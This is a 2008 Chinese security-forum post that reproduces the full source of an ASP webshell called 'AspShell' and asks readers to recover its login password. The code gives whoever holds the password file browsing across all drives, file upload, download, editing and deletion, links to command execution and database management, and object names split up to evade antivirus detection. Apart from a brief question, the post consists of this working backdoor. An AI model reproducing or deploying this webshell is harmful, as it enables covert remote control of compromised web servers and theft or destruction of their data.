Board logo

标题: [讨论]在红狼看见了一个ASP木马 谁来解密一下 [打印本页]

作者: 2000gaobo    时间: 2008-7-23 08:27     标题: [讨论]在红狼看见了一个ASP木马 谁来解密一下

[讨论]在红狼看见了一个ASP木马 谁来解密一下
议题作者:追寻
信息来源:邪恶八进制信息安全团队(www.eviloctal.com


密码是:
20225222   但是在这段代码上看上去没什么加密,但是却找不到密码明文。




[code]<SCRIPT LANGUAGE="JavaScript">
function killErrors() {
return true;
}
window.onerror = killErrors;
</SCRIPT>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}

function MM_popupMsg(msg) { //v1.0
alert(msg);
}
//-->
</script>
<script>
function ChangeDir(){
  if(MaoDiv.style.display==&#39;block&#39;)
  {  
    MaoDiv.style.display = &#39;none&#39;;}
  else
  {
    MaoDiv.style.display = &#39;block&#39;;
    MaoDiv.innerHTML = "<CENTER><br> <input type=text name=DirName id=DirName VALUE=&#39;c:\\&#39;> <input type=button onclick=\&#39;javascript:if(DirName.value!=\"\"){location.href=\"?q=list.asp&attrib=true&path=\" + DirName.value;}\&#39; value=GO> <font color=#999999 style=\&#39;cursor:hand\&#39; onclick=\&#39;ChangeDir()\&#39;>CLOSE</font></CENTER>";}

  MaoDiv.style.posLeft = window.event.x - 100;
  if(MaoDiv.style.posLeft < 0){
    MaoDiv.style.posLeft = 0;
  }
  MaoDiv.style.posTop = window.event.y + document.body.scrollTop - 10;
  }
</script>
<%Server.ScriptTimeOut=50000%>
<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%
if Request("q")="exit" then
Session("Password")=""
Response.write "<script>alert(&#39;已经成功退出!!!&#39;);window.close();</script>"
end if
on error resume next
dim Data_5xsoft
Class upload_5xsoft
dim objForm,objFile,Version
Public function Form(strForm)
strForm=lcase(strForm)
if not objForm.exists(strForm) then
Form=""
else
Form=objForm(strForm)
end if
end function

Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function
Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="HTTP Uploader Version 2.0"
set objForm=server.CreateObject("Scr"&b&"ipting.Dictionary")
set objFile=server.CreateObject("Scr"&b&"ipting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set tStream = server.CreateObject("Ado"&l&"db.Stream")
set Data_5xsoft = server.CreateObject("Ado"&l&"db.Stream")
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read
iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,"filename=""",1) > 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText
tStream.Close
if objForm.Exists(sFormName) then
objForm(sFormName)=objForm(sFormName)&", "&sFormValue  
else
objForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Ado"&l&"db.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
Rseb = Request.ServerVariables("script_name")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="qt-./31215" then
Session("Password")="LunHui"
response.redirect rseb & "?q=list.asp"
else %>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
</head>
<body>
<BR><BR>
<BR><BR>
</font>
<table border="1" width="500" height="80" bgcolor="#DDDDDD" cellpadding="3" bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0" align=center>
<tr>
<td width="100%" height="30%" bgcolor="#808080"><p align="center">
<font color="#FFFFFF" face="Comic Sans MS" style="font-size: 9pt"><B><%=httpt%></B></font></td>
</tr>
<tr>
<td width="100%" height="70%"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">
<div align="center"><center><p><font face="Comic Sans MS">
<span style="font-size: 9pt">Password: <input type="password" name="password"
size="20" style="background-color:#DDDDDD; border-left: none; border-right: none; border-top: none; border-bottom: solid 1px">
<input type="submit" value="Login" name="B1" style="border: thin outset"></span></font></p>
</center></div>
</form>
</td>
</tr>
</table>
</font>
<%
if request.form("password")<>"" then
response.write "<BR><BR><center><font color=red>轮回大叔很生气! 后果很严重-_-!</font></center>"
end if
%>
</body>
</html>
</font>
<%end if%>
<%case "down.asp"
if Session("Password")="LunHui" then
call downloadFile(request("path"))
end if
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear%>
<object runat=server id=s scope=page classid="clsid:00000566-0000-0010-8000-00AA006D2EA4"></object>
<%s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
case "list.asp"
urlpath=server.urlencode(path)
if Session("Password")="LunHui" then
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write "-<a href=&#39;" & rseb & "?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"&#39;><font color=&#39;#000000&#39;>上级目录:</font></a><br><script language=vbscript>"
For Each x In theSubFolders
%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%
Next
%></script>
<%
end if
End Sub
Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"<table border=&#39;1&#39; width=&#39;100%&#39; cellpadding=&#39;2&#39; cellspacing=&#39;0&#39; bordercolorlight=&#39;#C6CDDF&#39; bordercolordark=&#39;#FFFFFF&#39;><script language=vbscript>"
For Each x In theFiles
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if
%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<%
Next
end if
Response.write"</script></table>"
End Sub
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<%sub css()%>
<style type="text/css">
BODY,TD {
  FONT-SIZE: <%if UCase(Request.ServerVariables("HTTP_ACCEPT_LANGUAGE"))="ZH-TW" then response.write "10pt" else response.write "11px" end if%>; FONT-FAMILY: sans-serif,Verdana,宋体
  background-attachment: fixed;
  background-repeat: repeat-y;
  background-position: center;
}
Input {
  font-family: "Verdana", "Arial";
  font-size: <%if UCase(Request.ServerVariables("HTTP_ACCEPT_LANGUAGE"))="ZH-TW" then response.write "10pt" else response.write "12px" end if%>;
  font-style: normal;
  line-height: normal;
  font-weight: normal;
  font-variant: normal;
  height: 18px;
  border-right: 1px solid #CCCCCC;
  border-left: 1px solid #CCCCCC;
  border-top: 1px solid #CCCCCC;
  border-bottom: 1px solid #CCCCCC;
}
A:link {
  COLOR: #000000
}
A:visited {
  COLOR: #000000
}
A:active {
  COLOR: #000000
}
A {
  COLOR: #000000; TEXT-DECORATION: none
}
A:hover {
  COLOR: #495E6E
}
table{
  border-bottom: 1px solid #CCCCCC;
  border-top: 1px solid #CCCCCC;
  border-left: 1px solid #CCCCCC;
  border-right: 1px solid #CCCCCC;
  padding:0px
}
.table2{
  border-bottom: 0px;
  border-top: 0px;
  border-left: 0px;
  border-right: 0px;
  padding:0px
}
textarea {
  font-family: "Arial";
  font-size: 12
  font-style: normal;
  line-height: normal;
  font-weight: normal;
  font-variant: normal;
  background:#e5e5e5;
  border-bottom: 1px solid #CCCCCC;
  border-top: 1px solid #CCCCCC;
  border-left: 1px solid #CCCCCC;
  border-right: 1px solid #CCCCCC;
  padding:0px
}
input { border-top-width: 1px; padding-right: 1px; padding-left: 1px;
border-left-width: 1px; border-bottom-width: 1px; border-right-width: 1px;
background-color: #FFFFFF; cursor: hand;
font-size: 9pt; font-family: Verdana, Arial, Helvetica, sans-serif, ??; color: #000000;
}
</style>
<%end sub
call css()
%>
</head>
<div id="MaoDiv" style="background: #F7FBFF;position: absolute; width:250px; height:60px; left:100; top:40; display:none; z-index:9;border-right: 1px solid #CCCCCC;border-left: 1px solid #CCCCCC;border-top: 1px solid #CCCCCC;border-bottom: 1px solid #CCCCCC;"></div>
<script language="JavaScript">
function crfile(ls)
{if (ls==""){alert("请输入文件夹名!");}
else {window.open("<%=rseb%>?q=edit.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
function crdir(ls)
{if (ls==""){alert("请输入文件名!");}
else {window.open("<%=rseb%>?q=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "<tr>"
document.write "<td width=&#39;40%&#39;><a href=&#39;"& urlpath & lpath & xName &"&#39; target=&#39;_blank&#39;>" & showstring & "</a></td>"
document.write "<td width=&#39;10%&#39; align=&#39;right&#39;>" & round(size/1024,1) & " K</td>"
document.write "<td width=&#39;20%&#39; align=&#39;center&#39;>" & year(DateLastModified) & "-" & right("0"&month(DateLastModified),2) & "-" & right("0"&day(DateLastModified),2) & " " & FormatDateTime(DateLastModified,4) & "</td>"
document.write "<td width=&#39;30%&#39; align=&#39;center&#39;><a href=&#39;javascript:;&#39; title=&#39;类型:" & type1 & chr(10) & "属性:" & Attributes & chr(10) & "时间:" & DateLastModified &"&#39;>属性</a> <a href=javascript:; onClick=MM_openBrWindow(&#39;<%=rseb%>?q=edit.asp&path=" & lpath & xName & "&attrib=" & attrib &"&#39;,&#39;AspShell&#39;,&#39;scrollbars=no,status=yes,width=600,height=440&#39;)>编辑</a> <a href="&chr(34)&"javascript: rmdir1(&#39;"& lpath & xName &"&#39;)"&chr(34)&">删除</a> <a style=&#39;cursor:hand&#39; onclick=copyfile(&#39;" & lpath & Name & "&#39;)>复制</a> <a href=&#39;<%=rseb%>?q=down.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &"&#39;>下载</a></td></tr>"
end sub
sub so(lpath,xName,path,attrib)
if len(xName)>26 then
DispName=left(xName,25)&".."
else
DispName=xName
end if
document.write " <a href=&#39;<%=rseb%>?q=list.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &"&#39;>" & DispName &"</a>  <a href="&chr(34)&"javascript: rmdir(&#39;"& lpath & xName &"&#39;)"&chr(34)&">  →删除</a> <br>"
end sub
sub rmdir1(ls)
if confirm("确定删除文件:"&ls&"?")  then
window.open("<%=rseb%>?q=edit.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub rmdir(ls)
if confirm("确定删除文件夹:"&ls&"?")  then
window.open("<%=rseb%>?q=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub copyfile(sfile)
dfile=InputBox("原地址:"&sfile&vbcrlf&"目标地址:"&vbcrlf&"[Input path of current mode]")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "No Absolute Path in relative mode!"&vbcrlf&"Error Path: ["&dfile&"]"
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open("<%=rseb%>?q=edit.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert "请输入文件名!"
end If
end sub
</script>
<body>
</font>
<table border=0 Align=center width=758 cellspacing="0" cellpadding="3">
<tr>
<td colspan=2 height=25>
<font style="font-size:12px" face=Arial> The AspShell v1.0 Write By  <a href="http://www.wolfexp.net/" target="_blank" title="红狼安全小组">C.Rufus Security Team</a></font></td>
</tr>
<tr><td colspan=2 height=5 bgcolor=#808080></td></tr>
<tr>
<td width="100%" bgcolor="#F6F6F6" colspan="2" height="22">
<font style="font-size:12px" face=Arial> 盘符:<%
For Each thing in oFileSys.Drives
Response.write " <a href=&#39;" & rseb & "?q=list.asp&path="&thing.DriveLetter&":&attrib=true&#39;><font color=#000000>"&thing.DriveLetter&":</a></font> "
NEXT
set oScriptNet=Server.CreateObject("WSC"&e&"RIPT.NETWORK")
%> 网络地址: <%=httpt%>   <a href="#" onClick="MM_openBrWindow(&#39;<%=rseb%>?q=jc.asp&#39;,&#39;AspShell&#39;,&#39;scrollbars=yes,width=800,height=600&#39;);MM_popupMsg(&#39;读取系统进程时有点慢\r\r  请不要以为死机了&#39;)">进程查看</a>   <a href="<%=rseb%>?q=exit">退出</a> </font></td>
</tr>
<tr>
<td width="100%" bgcolor="#F6F6F6" colspan="2" height="22">
<font style="font-size:12px" face=Arial> 切换到:<%
if Request("attrib")="true" then
response.write " <a href=&#39;" & rseb & "?q=list.asp&#39;>网站目录</a> "
else
response.write " <a href=&#39;" & rseb & "?attrib=true&q=list.asp&#39;>完整模式</a> "
end if
iisver =Request.ServerVariables("SERVER_SOFTWARE")
%>
当前路径 / 点击跳转:<font color=#999999 title="点击跳转到指定目录" style="cursor:hand" onclick="ChangeDir()"> <%=cpath%> </font>  服务器Ip地址 / 查询Ip绑定: <a href="http://whois.webhosting.info/<%=Request.ServerVariables("LOCAL_ADDR")%>" target="_blank"><%=Request.ServerVariables("LOCAL_ADDR")%></a>
  IIS版本: <%=iisver%> </font>
</td>
</tr>
<tr><td colspan=2 bgcolor=#CCCCCC height=2></td></tr>
<form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data">
<tr height="25">
<td bgcolor="#F6F6F6" colspan="2"><font style="font-size:12px" face=Arial>
<input class="table" type="text" name="filename" size="20">
<input class="table" type="button" value="增加文件" onclick="crfile(form1.filename.value)">
<input class="table" type="button" value="增加文件夹" onclick="crdir(form1.filename.value)">
<input type="file" name="file1" class="table" style="width:100" value="" size="30">
<input type="text" name="filepath" class="table" style="width:100" value="<%=cpath%>" size="30">
<input type="hidden" name="act" value="upload">
<input type="hidden" name="upcount" class="table" value="1">
<input class="table" type="submit" value="上传">
<input class="table" type="button" onclick="window.open(&#39;<%=rseb%>?q=cmd.asp&#39;,&#39;_blank&#39;)" value="CMD">
<input class="table" type="button" onclick="window.open(&#39;<%=rseb%>?q=p.asp&#39;,&#39;_blank&#39;)" value="免FSO">
<input class="table" type="button" onclick="window.open(&#39;<%=rseb%>?q=sql.asp&#39;,&#39;_blank&#39;)" value="数据管理">
</span>
</td>
</font>
</td>
</tr></form>
<tr>
<td colspan=2 bgcolor=#CCCCCC height=2>
</td>
</tr>
<tr>
<td width="25%" valign="top" bgcolor="#F6F6F6"><%Call GetFolder()%></td>
<td width="75%" valign="top"><%Call GetFile()%></td>
</tr>
</table>
<table border=0 Align=center width=758 cellspacing="0" cellpadding="3">
<tr><td colspan=2 height=5 bgcolor=#808080></td></tr>
<tr>
</td>
<td colspan=2 Align=Right style="font-family:sans-serif,Verdana;font-size:11px;color:black">Copyright


帖子561 精华2 积分4271 阅读权限100 性别男 在线时间525 小时




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2